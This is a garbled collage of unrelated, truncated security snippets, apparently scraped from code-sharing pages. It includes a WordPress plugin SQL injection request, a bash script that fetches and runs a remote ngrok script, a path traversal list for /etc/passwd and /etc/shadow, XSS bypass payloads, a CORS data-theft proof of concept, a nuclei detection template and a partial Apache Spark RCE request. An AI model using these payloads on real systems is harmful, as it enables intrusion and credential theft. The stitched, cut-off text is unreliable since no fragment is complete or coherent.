poc:
GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1
sqlmap result:
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
#!/bin/bash | |
wget -O ng.sh https://github.com/kmille36/Docker-Ubuntu-Desktop-NoMachine/raw/main/ngrok.sh > /dev/null 2>&1 | |
chmod +x ng.sh | |
./ng.sh | |
function goto | |
{ | |
label=$1 | |
cd |
```zshrc | |
#▄███████▄ ▄████████ ▄█ █▄ ▄████████ ▄████████ | |
#██▀ ▄██ ███ ███ ███ ███ ███ ███ ███ ███ | |
# ▄███▀ ███ █▀ ███ ███ ███ ███ ███ █▀ | |
#▀█▀▄███▀▄▄ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄▄██▀ ███ | |
# ▄███▀ ▀ ▀███████████ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀▀▀ ███ | |
#▄███▀ ███ ███ ███ ▀███████████ ███ █▄ | |
#███▄ ▄█ ▄█ ███ ███ ███ ███ ███ ███ ███ | |
#▀████████▀ ▄████████▀ ███ █▀ ███ ███ ████████▀ | |
# ███ ███ |
/etc/master.passwd | |
/master.passwd | |
/etc/passwd | |
/etc/shadow%00 | |
/etc/passwd | |
/etc/passwd%00 | |
../etc/passwd | |
../etc/passwd%00 | |
../../etc/passwd | |
../../etc/passwd%00 |
<script>
x = '<!--<script>'/*</script>-->*/;alert(1)
layout | title |
---|---|
post |
xss cheat sheet |
# xss-cheat-sheet
# Basics Xss
HTML Context - Simple Tag Injection
Dorks are cool | |
Dorks for Google, Shodan and BinaryEdge | |
Only for use on bug bounty programs or in cordination with a legal security assesment. | |
I am in no way responsible for the usage of these search queries. | |
Be responsible thanks - https://www.bugcrowd.com/resource/what-is-responsible-disclosure/ | |
This repository is "under construction" feel free to make pull requests :-) |
<html> | |
<body> | |
<button type='button' onclick='cors()'>CORS</button> | |
<p id='demo'></p> | |
<script> | |
function cors() { | |
var xhttp = new XMLHttpRequest(); | |
xhttp.onreadystatechange = function() { | |
if (this.readyState == 4 && this.status == 200) { | |
var a = this.responseText; // Sensitive data from niche.co about user account |
id: SQLInjection_ERROR | |
info: | |
name: SQLINJECTION Detection | |
author: 0x240x23elu & OFJAAAH | |
severity: High | |
requests: | |
- method: GET |
Apache Sprak RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{